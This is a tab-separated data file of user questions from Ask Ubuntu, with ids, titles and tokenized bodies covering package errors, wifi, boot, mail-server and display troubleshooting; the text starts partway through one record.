not found . dpkg : error processing whoopsie ( -- configure ) : subprocess installed post-installation script returned error exit status 100 errors were encountered while processing : modemmanager whoopsie e : sub-process /usr/bin/dpkg returned an error code ( 1 ) root @ localhost : / #
445809	will `` 0 a.d. '' play in lubuntu os ?	i 'm a novice to computers and new to lubuntu . i went to `` apps.ubuntu.com '' and it stated `` 0 a.d. '' has available versions for : ubuntu 13.10 - 13.04 - 12.10 & 12.04 lubuntu is not on the list . does it matter ?
445813	passwd : authentication token manipulation error	i could n't use the command mount -rw -o remount / . this command asks for sudo password and then when i typed my password , it shows your password has expired . it is almost a deadlock now . somebody please help .
445814	run scripts after installation	i have to run a command ( mounting windows file system . machine is a dual boot system ) . if ubuntu is already installed , i can go to /etc and edit rc.local and put my mounting commands there . so the next my ubuntu starts , it will execute those commands and mount the windows file . but my problem is , right now ubuntu is not installed . i want to run the commands automatically when the ubuntu gets installed the very first time .
445815	wubi or live dvd ?	i want to install ubuntu on this machine . is there any benefit to installing with live dvd compared to wubi ?
445817	internet stops working after some time	after i log in to ubuntu , internet works fine for some time ( for around 45 mins or so ) but then it suddenly stops working . i 'm on 14.04 now and i 've faced similar problem in 13.10 . i 'm connected using wifi , but i face the same issue when connected using ethernet cable . please ask me any details which can help in diagnosing the issue . i get a dialog box which says `` a system problem as occurred '' and then internet crashes . from /var/log/syslog - cat /var/log/syslog | grep networkmanager | grep error apr 10 01:50:55 < machine-name > networkmanager [ 832 ] : < warn > error monitoring device for netlink events : no buffer space available apr 10 02:06:36 < machine-name > networkmanager [ 760 ] : < error > [ 1397113596.497261 ] [ nm-dns-dnsmasq.c:400 ] update ( ) : dnsmasq owner not found on bus : could not get owner of name 'org.freedesktop.networkmanager.dnsmasq ' : no such name from dmesg | grep -e eth0 -e ipv -e dns -e dns - dmesg | grep -e eth0 -e ipv -e dns -e dns [ 0.920865 ] key type dns_resolver registered [ 0.976650 ] r8169 0000:03:00.0 eth0 : rtl8168evl/8111evl at 0xffffc90000c2a000 , 18:67 : b0:27:02 : c6 , xid 0c900800 irq 42 [ 0.976652 ] r8169 0000:03:00.0 eth0 : jumbo features [ frames : 9200 bytes , tx checksumming : ko ] [ 23.017231 ] ipv6 : addrconf ( netdev_up ) : eth0 : link is not ready [ 34.125468 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 34.125715 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 34.672505 ] r8169 0000:03:00.0 eth0 : link down [ 34.672562 ] ipv6 : addrconf ( netdev_up ) : eth0 : link is not ready [ 34.672927 ] ipv6 : addrconf ( netdev_up ) : eth0 : link is not ready [ 41.473249 ] ipv6 : addrconf ( netdev_change ) : wlan0 : link becomes ready
445820	could not get lock / var / lib / dpkg / lock	iam a new ubuntu user and get this mistake always ! could not get lock / var / lib / dpkg / lock can help me everybody ? ? markus
445821	upgrading openssl on ubuntu 10.04.4 lts - heartbleed	i have a server which is using ubuntu 10.04.4 lts . i read that this os version is not effected because it comes with older version of openssl , 0.9.8 or similar . but my server show following on running openssl version -a which means its openssl was updated . openssl 1.0.1 14 mar 2012 built on : tue mar 27 14:41:54 edt 2012 platform : linux-x86_64 when i check our website hosted on this server via filippo.io/heartbleed it says site was not affected i still tried to update my server via sudo apt-get update and sudo apt-get upgrade but openssl version still remains the same . i have two questions do i need to upgrade my openssl ? how do i do it on ubuntu 10.04.4 ?
445822	bookmarks problem in firefox	i can not bookmarks links . when i click on bookmarks button or 'bookmarks this page ' from bookmarks menu it does not work
445830	openvpn server on home desktop & client on laptop	i would like to setup a small vpn server on my home desktop using ubuntu precise ( shortly to be using trusty ) . the aim is to be able to do secure online banking on my laptop ( also using ubuntu precise , shortly trusty ) when it is connected to a public wifi 'point ' such as o2wifi . i have found a number of guides but ca n't decide which to use . can anybody point me to the best one ( s ) fro both the server & the client . i have also wondered about using a 3rd part vpn service . i found a free one called vpnbook . any thoughts on that ?
445834	grub does not list an option for windows 8	i installed ubuntu 12.04 alongside windows 8.1 , and after that when i boot my computer the grub menu come up and i have the option to boot ubuntu regularly , or in safe mode , but i do n't have the option to boot windows . i 've tried using grub customizer , but that did n't work , so i then came here , but i just do n't know what i 'm doing in general , so if you could seriously dumb it down for me ( like literally step by step ) that would be awesome !
445835	unity minimize not working properly	i have some problem with the minimize key in ubuntu it does not work properly . only the last app i minimize , gets stuck , this also does not allow me to switch to other apps , but when i use the alt+tab key it starts working normally , but the last app still gets stuck . i have 2 images attached here , the first one shows when animations are off and the second when animations are on , can someone help me ? and thanks in advance .
445836	thinkpad e540 , ubunutu 13.10 , wifi problems	my machine : thinkpad e540 , ubunutu 13.10 hi , i have several problems with my wifi internet connection . i assume that my problem is ( strongly ) related to this problem : no wifi connection on ubuntu 13.10 the patch there helped , however i still have several issues : 1 ) my wifi is ( sometimes ) not listed at all in the list of available networks 2 ) my wifi is ( sometimes ) greyed out in the list of available networks 3 ) when connection to my wifi , i get asked for the password again and again . 4 ) sometimes the connection works fine but suddenly stops 5 ) sometimes the connection is very slow all the time ( e.g . 8kb ) in between those problems , it works fine . i had no problems under ubuntu 12.10 . it is quite a frustrating problem . my guess so far is , that the hardware is not sufficiently supported in 13.10 and my hope is on the next 14.04 release . so , basically my question is : does anybody know , if an upgrade to ubuntu 14.04 is likely to fix those issues ? any reply/help much appreciated !
445837	x keeps restarting without getting to login screen	i am running ubuntu 13.10 in my pc . two days ago , oneconf crashed while i was working and i had to restart the computer . since then , i have n't been able to go past the black screen to the login screen , after booting . i used the cli console tty1 ( ctrl+alt+f1 ) to check syslog , xorg.0.log , dmesg , etc . i got the following message repeated over and over in syslog : apr 9 00:40:11 atul gnome-session [ 16679 ] : warning : icelockauthfile failed : permission denied apr 9 00:40:11 atul gdm-simple-slave [ 16479 ] : glib-gobject : g_object_ref : assertion 'object- > ref_count > 0 ' failed apr 9 00:40:11 atul gdm-simple-slave [ 16479 ] : glib-gobject : g_object_unref : assertion 'object- > ref_count > 0 ' failed apr 9 00:40:12 atul acpid : client 16484 [ 0:0 ] has disconnected apr 9 00:40:12 atul acpid : client 16484 [ 0:0 ] has disconnected apr 9 00:40:12 atul acpid : client connected from 16752 [ 0:0 ] apr 9 00:40:12 atul acpid : 1 client rule loaded apr 9 00:40:12 atul acpid : client connected from 16752 [ 0:0 ] apr 9 00:40:12 atul acpid : 1 client rule loaded apr 9 00:40:12 atul gdm-simple-slave [ 16747 ] : failed to give slave programs access to the display . trying to proceed . moreover , my ( ctrl-alt-f1 ) session keeps getting interrupted by the main gui ( ctrl-alt-f7 ) . it looks like the x/gdm keeps restarting in an infinite loop . i was n't able to find any direct solution in the web . but i tried some solutions given for similar problems . i tried reconfiguring gdm , xserver-xorg . i tried reinstalling xserver-xorg , gdm , gnome-shell , gnome-session , etc . i tried removing ubuntu-gnome-desktop entirely and use unity instead . none of them worked . when i tried using lightdm instead of gdm , i got `` system running in low graphics mode '' error . when i tried recovery mode with failsafe gui , my failsafex did not start . when i tried startx in my cui ( ctrl-alt-f1 ) , i get a gui at ctrl-alt-f8 . but i still get interrupted by ( ctrl-alt-f7 ) when gdm restarts . when i stop gdm service , my applications start crashing in my gui . any suggestions ?
445838	how to save downloaded updates only to be used on a computer without internet	i searched askubuntu and got many solution , many of which are very complicated and eats huge bandwidth like say building an off-line deb archive . is there any manual way to save the installed updated and packages only , so that i can use them later to install if anything goes wrong and i have to make a fresh install . thanks in advance . aude sapere
445841	postfix - `` skipped , still being delivered '' ( +permission denied )	i have an issue that 's driving me crazy . running ubuntu 12.04 on digitalocean , i followed this tutorial to set up postfix , dovecot , vimbadmin and roundcube : https : //rtcamp.com/tutorials/mail/server/postfix-dovecot-ubuntu/ everything has been working fine for almost a week so far until suddenly today my incoming mail started getting stuck in the queue . i can see the emails using postqueue -p but they 've just been sitting there for over 5 hours . i am able to send email to other hosts just fine , but i ca n't receive emails i send to myself either . in my mail.err log i keep seeing lots of this : apr 8 16:10:30 marcusforsberg master [ 14769 ] : fatal : master_spawn : exec /usr/lib/postfix/f : permission denied but nothing else in the error log , just that line over and over . the mail.log file keeps giving me this : apr 8 15:48:07 marcusforsberg master [ 5841 ] : fatal : master_spawn : exec > /usr/lib/postfix/f : permission denied apr 8 15:48:08 marcusforsberg postfix/master [ 5758 ] : warning : process /usr/lib/postfix/f > pid 5841 exit status 1 apr 8 15:48:08 marcusforsberg postfix/master [ 5758 ] : warning : /usr/lib/postfix/f : bad > command startup -- throttling and for each email : apr 8 15:46:05 marcusforsberg postfix/qmgr [ 5770 ] : 7d40416365e : from= , size=5691 , nrcpt=1 ( queue active ) apr 8 15:51:40 marcusforsberg postfix/qmgr [ 5931 ] : 7d40416365e : skipped , still being delivered running postqueue -f has no effect , nor has resetting the postfix config ( dpkg-reconfigure postfix ) , restarting postfix or rebooting the server ( this has worked before when e-mail got stuck ) . i 've spent the better part of the day researching this but i have n't found much useful . the only change done before this started malfunctioning was that i rebuilt my digitalocean droplet from a snapshot . before this , everything was working just fine . i had seen the `` permission denied '' errors regularly as well but i was still able to receive email . here is my main.cf for postfix : http : //pastebin.com/hrxhkwz7 and my master.cf : http : //pastebin.com/mv9gcuni if anyone has any suggestions or links to solutions i have missed , please do let me know . or if i should share any other configuration files or logs . thanks in advance for any help ! ( this is a repost of my question on do , where i have n't had much luck . i hope that is allowed and that this is even a good place for this question ... please let me know otherwise ! )
445842	wifi not connecting to hp pavilion g6 2125tu	i have installed ubuntu 12.04 along side with separate drive . the problem is ubuntu cant find the wifi network but the windows connect with strong signal . when i get close to the wifi router then ubuntu can connect with very slow connection . how can i get rid from this kind of situation ? already tried sudo rfkill unblock wifi wifi signal weak while on an hp pavilion g6
445843	`` file : ///var/www '' in the chrome browser to be opened in nautilus	when i enter `` file : ///var/www '' in my chrome url bar i see the folder listing . instead i want this to be opened by the nautilus . any idea what flag i need to set in chrome or change i should make in ubuntu configuration files ?
445844	will my files also be deleted from local ubuntuone folders ?	ubuntuone is shutting down , and today we all received an email informing us of the following : while the service will stop as of 1 june , you will have an additional two months ( until 31 july 2014 ) to collect all of your content . after that date , all remaining content will be deleted . from where will the content be deleted ? only from their servers ? or do i need to fear that i will also lose local data ?
445848	any way to change lightdm unity greeter background without changing current config files ?	about changing lightdm unity greeter background image , most answers are to change /usr/share/glib2.0/schemas/com.canonical.unity-greeter.gschema.xml . is there any way to change the default wallpaper in lightdm unity greeter without changing the file ? like an override file . i 'm making a debian package that would apply our own artwork after installing . i ca n't changing the file content in my maintainer script , which would violate debian packaging policy . i can change the unity desktop background by adding a schema override file in the same folder , but i could n't find a way to change the lightdm background with similar way .
445849	command 'latex2html '	wonder whether this is an ubuntu question or a latex question : i am trying to output my latexed cv in html format , using latex2html - probably the easiest way . my objective is this i want all sections and their contents to appear one after another . ( default appearance is the list of all section headers in the form of links and only on clicking them do i see the contents of the section ) i tried attacking it the way . this is the closest i got : i gave the command : man latex2html to explore the various features . the option that seems promising in this matter is -split . split 0 is the one that keeps the entire doc in a single file as found on giving man latex2html command . aneesh @ aceraod : ~ $ latex2html [ -split 0 ] cv.tex defined ( % hash ) is deprecated at /usr/bin/latex2html line 515 . ( maybe you should just omit the defined ( ) ? ) defined ( % hash ) is deprecated at /usr/bin/latex2html line 2087 . ( maybe you should just omit the defined ( ) ? ) defined ( % hash ) is deprecated at /usr/bin/latex2html line 9088 . ( maybe you should just omit the defined ( ) ? ) this is latex2html version 2008 ( 1.71 ) by nikos drakos , computer based learning unit , university of leeds . revised and extended by : marcus hennecke , ross moore , herb swan and others ... producing markup for html version 4.0 extension : loading /usr/share/latex2html/versions/latin1.pl html version : loading /usr/share/latex2html/versions/html4_0.pl *** processing declarations *** resetting image-cachecannot read ./ [ .tex unfortunately this did n't work . can somebody help ?
445855	menu item selection problems	this might sound weird : i 'm using gnome2 and try to set up thunderbird message filters . however if i try to select the action i 'm not able to select the right entry in the sub-sub-menu , because the menu disappears at some point , it is a bloody puzzle . is there any setting that makes this a bit easier ?
445857	unable to install ubuntu with vmware workstation	i am not able to install ubuntu using vmware workstation . every time i begin installation on the virtual machine my laptop restarts.i am using hp envy x2 ultrabook .
445860	low-graphic mode	i installed ubuntu 13.10 on my notebook acer travelmate 212txv.the installation runs without problems . after installation i get the message `` the system is running in low-graphics-mode '' . i can`t solve this problem . i tried all the suggested solutions , f.e . failsafex , but do not have any chance to go into terminal .
445865	how to install `` jsim '' network simulator in ubuntu 12.04 ?	how to install j-sim network simulator in ubuntu 12.04 with terminal ?
445866	how can i store printers locally ?	i usually upgrade to a new version of ubuntu by making a clean install . i do use a separate /home partition , so most of my application settings stay in place . one thing that bothers me though , is that i have to reinstall my network printer each time i upgrade my ubuntu . i would like to get rid of this by storing this printer 's configuration locally , just like the other applications . how can i get this done ?
445868	malformed line in my sources list , how to resolve ?	before i start , i 've tried the solution from this thread how do i remove a malformed line from my sources.list ? but unfortunately , the steps performed in that thread are already covered for me . the error i 'm getting is : malformed line 3 in source list /etc/apt/sources.list.d/cloudarchive-havana.list ( dist ) e : the list of sources could not be read . i 'm not too sure what is causing this but it wo n't allow me to use the ubuntu software center or perform any updates . here is the output from the malformed directory : deb http : //ubuntu-cloud.archive.canonical.com/ubuntu precise-updates/havana main deb-src http : //ubuntu-cloud.archive.canonical.com/ubuntu precise-updates/havana main deb http : //docs.openstack.org/havana/install-guide/install/apt/content/basics-packages.html can anyone point me in the direction of a solution please ?
445870	mix two pcm audio	i am capturing audio data using pulse audio for every sink index index in file . but after this i want to mix two audio sample from different file . my sample specification is format = pa_sample_s16le , rate =44100 , channels =2 . thanks in advance
445872	window goes balnk white if i do n't use for even 5 mins	ubuntu was working fine.. but it restarted many times today , as i tried to watch streaming video . after that , if i leave any opened window unused for some time , the window is going white . ( like an opened web browser window screen is completely white and folders in windows are not seen ) . kindly let me know the detailed steps to solve this issue if any , as i am new to ubuntu . regards srik
445874	can not install pidgin	i am trying to install pidgin-ppa from software centre but it 's showing the installation or removal of a software package failed perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_in.iso8859-1 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_in.iso8859-1 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_in.iso8859-1 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory selecting previously unselected package pidgin . ( reading database ... ( reading database ... 5 % ( reading database ... 10 % ( reading database ... 15 % ( reading database ... 20 % ( reading database ... 25 % ( reading database ... 30 % ( reading database ... 35 % ( reading database ... 40 % ( reading database ... 45 % ( reading database ... 50 % ( reading database ... 55 % ( reading database ... 60 % ( reading database ... 65 % ( reading database ... 70 % ( reading database ... 75 % ( reading database ... 80 % ( reading database ... 85 % ( reading database ... 90 % ( reading database ... 95 % ( reading database ... 100 % ( reading database ... 174491 files and directories currently installed . ) preparing to unpack ... /pidgin_1 % 3a2.10.9-0ubuntu3_amd64.deb ... unpacking pidgin ( 1:2.10.9-0ubuntu3 ) ... selecting previously unselected package pidgin-libnotify . preparing to unpack ... /pidgin-libnotify_0.14-9ubuntu2_amd64.deb ... unpacking pidgin-libnotify ( 0.14-9ubuntu2 ) ... processing triggers for man-db ( 2.6.6-1 ) ... locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory processing triggers for gconf2 ( 3.2.6-0ubuntu2 ) ... ( gconftool-2:10421 ) : gconf-warning ** : client failed to connect to the d-bus daemon : unable to autolaunch a dbus-daemon without a $ display for x11 locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_collate to default locale : no such file or directory processing triggers for bamfdaemon ( 0.5.1+14.04.20140408-0ubuntu1 ) ... rebuilding /usr/share/applications/bamf-2.index ... processing triggers for gnome-menus ( 3.10.1-0ubuntu2 ) ... processing triggers for desktop-file-utils ( 0.22-1ubuntu1 ) ... processing triggers for mime-support ( 3.54ubuntu1 ) ... setting up pidgin ( 1:2.10.9-0ubuntu3 ) ... setting up pidgin-libnotify ( 0.14-9ubuntu2 ) ... please help
445875	changing from fahrenheit to celsius in weather dash plugin	when you search for a city and enable the weather filter the weather is shown in fahrenheit . how do i change this to celsius .
445878	ubuntu 12.04 fails to boot from harddrive after install ( grub works fine , no uefi )	message during boot : fixing recursive foult but reboot is needed ! dell inspiron 1501 , 1.8 tureon 4gb ram after upgrade from ubuntu 10.04 to 12.04 it was very slow boot up . in case of it i decided to make reinstall from livecd flash ( which boot up was much faster ) . installation successfully completed , but after reboot laptop holds . on video is boot process after grub in recovery mode . video of boot up
445879	< ask > openstack ha tenant and network	i want to ask about openstack ha . actuallly this is active/passive mechanism ( cmiw ) . i want to create replicate between both of machine include instance and data inside instance . the active one will replicated to passive one , right ? now my condition is server1 pacemaker + corosync server2 pacemaker + corosync openstack ( nova , glance , keystone , horizon ) on both my machine have to be on cluster . now i 'm on progress install openstack on server1 . but i have problem . when i try to create tenant `` admin '' , it said that tenant `` admin '' have been exist . i try to execute keystone tenant-list , it 's right that tenant admin and all of tenants from server2 have been exist , i think it 's because of openstack on server2 have been to be one cluster with server1 my question is : on server1 , should i create another tenant , rule , etc which different from tenant , rule , and etc from server2 ? how about floating ip and fixed ip . should i create different network too ? thanks
445881	collect2 error while compiling fortran code	i have installed necdf-4 successfully . i am getting collect2 : error : ld returned 1 exit status error when i compile a fortran code that writes netcdf files . i use gfortran compiler . i am sure the code is bug free . what could be the reason for the problem ? please suggest a solution .
445882	what to do when the keyboard and mouse no longer respond normally on ubuntu	what do you do when the mouse pointer disappears from the screen , or stops moving and regular keyboard shortcuts such as switching between apps or different desktops stops working and the only thing that seems to work is ctrl-alt-f1 to open a new terminal ? ubuntu 12.04.02lts on lenovo y580
445884	input method icon invisible in radiance theme	as i am czech , but i also need to write in english , i am switching through czech keyboard layout and english keyboard layout . in ambiance i could see what keyboard layout am i using simply by looking at the icon : ( please note , i am re-using screen from my previous question but i feel you will get the idea ) after switching to radiance , the icon looks kinda invisible : is there a way to change the icon ? or should i apply the simplest solution , which is ( quietly weep and ) switch back to ambiance ? edit after reboot of machine everything seemed ok : but today , i turned on my computer from shutdown and i am back on `` invisible '' icon . any idea ?
445885	why do i see two network indicators in ubuntu 14.04 ?	after some updates , i noticed that there are 2 network indicators shown in the top panel . the first network-indicator on the left is the original one which is present in all ubuntu 14.04 systems . the second one seems strange . you can see a screenshot of the second network indicator at https : //i.imgur.com/u4ygz9f.jpg . i am using the default unity setup with not many changes .
445886	what does the heartbleed bug mean for ubuntu ? is ubuntu not as secure as i thought ?	i hope this question is n't closed for being subjective because i think there is a correct answer somewhere , even if it 's a wiki-style explanation answer . one reason for using open source software for me has always been security . being safe in the knowledge that the important programs i 'm running are being looked at by thousands of people every day so that security issues can be fixed . i do n't really understand the bug , but it 's apparently quite bad and has been around for about 2 years . does this mean ubuntu is n't as secure as i have been led to believe ? that really there 's a chance there are security flaws in ubuntu that are compromising me now ? or is there an explanation for why this happened despite it being open source , but we do n't need to worry about ubuntu . is ubuntu just as unsafe as windows ( or maybe safer but not by much ? )
445888	web video 's not working	hello i am using ubuntu for a while now . and i installed it on my mums 10 year old pc ( as replacement for xp ) . and i simply do n't get videoplayback in chrome/firefox working . what i tried for so far : using the html5 player ( fail ) installing nvidia drivers ( nvidia19 ) disabling peperflash results : cpu jumps to full load video at 1 frame/sec sound works perfectly : ) video works better if it is loaded completely pc specs : celeron d 3.6ghz ( single core ) ( supports 64 bit runs 32 bits ubuntu ) 1gb ddr1 ram ( 2 512mb modules ) nvidia gt220 ( 3th video card for so far . this pc is a video card eater : d ) youtube always worked on windows xp i think it should work because vlc/smplayer run perfectly movies .
445889	gpgkeys : http fetch error 7 : could n't connect to host	i am trying to upgrade my php version 5.3 to 5.4 but it is throwing the error i am using ubuntu 10.04 lts - the lucid lynx please help me to resolve this root @ shanmugam-desktop : ~ # sudo add-apt-repository ppa : ondrej/php5-oldstable gpg : keyring `/tmp/tmplauyst/secring.gpg ' created gpg : keyring `/tmp/tmplauyst/pubring.gpg ' created gpg : requesting key e5267a6c from hkp server keyserver.ubuntu.com gpgkeys : http fetch error 7 : could n't connect to host gpg : no valid openpgp data found . gpg : total number processed : 0 recv failed
445894	boot repair enabled ubuntu after multiple attempts but not xp	first two link numbers are 7229750 and 99 , followed by ... http : //paste.ubuntu.com/7229810/ ... and finally ... http : //paste.ubuntu.com/7229947/ after several attempts ( re above urls ) with boot repair , i was finally able to boot into my ubuntu 12.04 installation , but despite trying everything i could think of , xp still not recognized as a boot option . the problems began when i tried 64-bit ubuntu 12.04 using the windows loader to install it beside windows 7 , also 64-bit . at first , i was able to see only the boot menu with windows xp ( 16-bit ) as default and windows 7 as the other option , but after selecting one ( xp or maybe it was windows 7 , not sure ) of the options , i would find another boot menu with the option to boot ubuntu . since that was a bit weird , and 64-bit ubuntu was nearly as slow as 64-bit windows 7 , i decided to install 32-bit ubuntu instead . the windows installer link for that version seemed to be broken and directed me instead to an iso copy , which i burned and installed from dvd , overwriting the partition containing the two 64-bit oses . unfortunately , each successive step from there has only made it seem less likely that i can get to my original xp installation , though the files seem to still be all there . to be specific , xp and it 's files appear intact on original windows c which i think is sda1 , but it does not appear as a boot option even though i 've tried making it my default in at least two ways . windows 7 has been wiped , both through ubuntu partitioning and installation , and through windows , while xp was still booting . this leaves ubuntu ( 32-bit ) as the only installation on the second physical drive . sdb5 is / , 6 for /home , and 7 for swap . hope that made some kind of sense , and any help is much appreciated !
445897	have wget fall back to ipv4 if ipv6 fails	i have a ubuntu 12.04 server that has some script that do a wget to others servers ; some of those scripts starting to fail , i found the reason : the wget make a request to a remote server who only have a ipv4 , and by default my server ask for the ipv6 , if there is not one , it give me `` not found '' . is there a way to configure that if ipv6 fails , use the ipv4 ? i read that some users modify gai.conf adding `` precedence : :ffff:0:0/96 100 '' , what i understand from that is : use first ipv4 , but what i want is : use ipv6 , if fails use ipv4 is this possible ?
445900	ca n't fetch from old-releases.ubuntu.com	has the package management for old unsupported systems been changed ? i have my sources.list set up to fetch from old-releases.ubuntu.com but all i get when doing an apt-get is : could not connect to old-releases.ubuntu.com:80 ( 91.189.88.17 ) , connection timed out
445903	what are the different ways to install a software on ubuntu ?	i am a beginner trying to understand how installation of software works in ubuntu . i have installed a lot of softwares on my system but everytime i want to install something i will just google and follow without really unerstaing how it works.the different ways i have done installation sudo apt-get install dowload .deb and use dpkg install from ubuntu software center synpatic package add link to sources.list using ppa why are there so many ways to install a software ? . what is the difference ? .how does these different ways of instaling it works ? any help or links would be appreciated .
445905	the following signatures were invalid : nodata 1 nodata 2	how i do i resolve this issue ? most fixes are on gpg errrors but my issue is not a gpg error . i have tried everything from this post to this post . they all fix he key issue and all those fixes are not working in my case . someone please help .
445906	trouble with `` waiting for headers ``	it seems duplicate but really it 's not , i 'm really tired of testing all solutions and reaching no success . even i 'm thinking about going back to windows because i had several problems with ubuntu 12.04 . when i type sudo apt-get update 0 % [ waiting for headers ] appear and stick at this percent and sometimes it goes up to 15 or 30 or ... i change my server from sources.list and also i chose best server from update manager and even pick software update 's checkbox tick but eventually no change to my problem . do you have any idea to fix it ? i ca n't wait anymore . thanks in advance
445908	nautilus can not handle `` computer '' locations	when i run naultilus as root by command : gksudo nautiuls it works well . but when i click on menu-bar go to computer , i get error : '' could not display `` computer : '' . `` , `` nautilus can not handle `` computer '' locations . '' how to solve , is there any problem in ./config ? as normal user ( not sudo ( root ) ) nautilus properly display computer as below
445910	quick way to open terminal in current folder in nautilus ?	i use the nautilus-open-terminal package . before upgrading from 13.10 to 14.04 , nautilus used to have a settings button on the top right panal where you can click something like `` open in terminal `` to open the terminal here . after upgrading to 14.04 , the settings icon is gone and i have to return to the parent folder and right click on the folder to open terminal here . ( because in list view the folder might have many files so that there is no white space i can right click to show the `` open in terminal '' menu . ) the solution mentioned here : keyboard shortcut for `` open a terminal here '' doesn ' t seem to work for me .
445912	dell xps13 with external monitor . showing black squares / dots on screen when scrolling	i have a dell xps13 ( 9333 ) running ubuntu 12.04.4 it is attached to an external monitor ( 17 '' ) via a mini-dvi to vga cable . this is not the dell install of ubuntu but a fresh install so as to have fde from time to time when scrolling in programs such as thunderbird , firefox or libreoffice square blocks will appear as if the screen is not refreshing properly . these squares will follow the scrolling of the page rather than be in a fixed position on the screen . they will disappear if they scroll off screen or you tab to another windows . if would appear that a way to reproduce this would be to scroll up and down quickly multiple times .
445916	wifi authentication problem - a common issue ?	i have a small form factor pc that i rescued from being thrown out by work , and i had the idea to try linux on it ( i am experienced with hardware etc . but completely new to linux ) . it 's an ideq 210v from ~2004 , so i first tried lxle based on ubuntu 12.04 . i have tried ubuntu 13.10 today as well , but still have the same problem ; i can not authenticate with my router when wpa is being used . with both lxle and ubuntu 13.10 it will connect when the router is open , so i do n't think it is a hardware or driver issue . i am using a spare belkin pcmcia wifi card in a pci cardbus adapter on the sffpc . i 've done a bit of reading and tried lshw in terminal , and as far as i can see the driver rtl61 is correct , and loaded/working properly - as evidenced by connection holding when the router is open ( but obviously , i do n't want to leave my router in an unsecured mode ) . i have installed alongside xp and the card works fine in xp . it goes without saying every other device i own , windows and android , connect without problems - this leads me to think this is a problem with ubuntu and a setting or configuration etc . needs to be changed , but as a novice i do n't know where to go . i 'd love to get lxle working with a network connection ( i think regular ubuntu might be too much for the hardware capabilities of this pc ) so any suggestions , or info i can provide , please let me know . many thanks
445922	refresh rate is 120hz while my screen is 60hz	i do n't understand why i have to different refresh rate on my system : here is my xrandr output : $ xrandr screen 0 : minimum 320 x 200 , current 1600 x 900 , maximum 8192 x 8192 dvi-i-1 connected 1600x900+0+0 ( normal left inverted right x axis y axis ) 443mm x 249mm 1600x900 60.0*+ 1280x1024 75.0 60.0 1152x864 75.0 1024x768 75.1 60.0 800x600 75.0 60.3 640x480 75.0 60.0 720x400 70.1 dp-1 disconnected ( normal left inverted right x axis y axis ) dp-2 disconnected ( normal left inverted right x axis y axis ) and my glxgears output : $ glxgears running synchronized to the vertical refresh . the framerate should be approximately the same as the monitor refresh rate . 601 frames in 5.0 seconds = 119.982 fps 600 frames in 5.0 seconds = 119.916 fps 600 frames in 5.0 seconds = 119.916 fps 600 frames in 5.0 seconds = 119.916 fps xio : fatal io error 11 ( resource temporarily unavailable ) on x server `` :0 '' after 4999 requests ( 4999 known processed ) with 0 events remaining . i have an nvidea graphics boards .
445923	how can one run a shell script just before the desktop session begins ?	i want my system to run with 1366x768 resolution . note that this resolution is not detected by the open source driver . so i created a bash script as follows : - xrandr -- newmode `` 1368x768_60.00 '' 85.25 1368 1440 1576 1784 768 771 781 798 -hsync +vsync xrandr -- addmode dvi-0 1368x768_60.00 xrandr -- output displayport-0 -- off -- output dvi-0 -- mode 1368x768_60.00 -- pos 0x0 -- rotate normal -- output hdmi-0 -- off and saved it as lightdmxrandr.sh in /usr/bin and also made it executable . in /usr/share/lightdm/lightdm.conf.d/50-ubuntu.conf , i added these lines : - greeter-session=unity-greeter display-setup-script=/usr/bin/lightdmxrandr.sh session-setup-script=/usr/bin/lightdmxrandr.sh now i saved the file and rebooted my pc . my login screen had 1366x768 resolution . so i happily typed in my password and pressed return . but when my desktop starts i dont have 1366x768 resloution ! i tried running the script above at runlevel . that didnt work . infact even the login screen 's resolution did'nt change ! so i need to know what must be done to make that script run just before the desktop session begins . thanks in advance . ps : - i have an ati radeon 5570 hd graphic card . i am using the amd redwood open source drivers . i know that i can get the 1368x768 resolution with a amd proprietary driver from the amd website . but i prefer to use the open source drivers . if you have patience , read this question too . the above question was born out of problems arose by that question . also note that i am using ubuntu 14.04 but this question is not too '14.04 specific ' .
445924	how to trick the ubuntu version as seen by an application ?	i 'm trying to install intel beacon mountain on ubuntu 13.10 ( saucy salamander ) 64-bit . but the installer complained about it is not a supported os . the installer only supports 12.04 , 12.10 and 13.04 . i looked at the script , but eventually it runs another installer ( binary executable ) , and it seems to check the ubuntu version itself . i just gave it a try to modify /etc/issue and /etc/issue.net , but as expected , i had no luck . i 'm not sure what mechanism the installer use to check os version . maybe lsb_release ? is there any general approach to trick the os version ? actually , i do n't have much interest in installing beacon mountain , but i want to know the way to trick the os version .
445925	what will be my next step to install ubuntu	i am totally new to ubuntu , i have download the latest ubuntu 12 64bit ( ubuntu-12.04.4-desktop-amd64.iso ) from the ubuntu site , the file is approx 700mb . i want to install it on my laptop ( currently on windows 7 32bit ) that 's why i copied the file to my usb then paste it to the c : drive of my windows platform , ( the file is in rar format ) that 's why i extracted it and found that there is wubi.exe ( which is the ubuntu installer for windows ) . now what should i do , do i ? just click the wubi.exe and follow the process , will wubi.exe need any internet connection to download any other extra file or 700mb is enough . sorry for my poor english .
445926	the difference between simply installing software & adding to repository	i have a simple question coming from my mind . what is the difference between : sudo add-apt-repository ppa : cwchien/gradle sudo apt-get update sudo apt-get install gradle and simply sudo apt-get install gradle which one should i use & why ? thanks for your time .
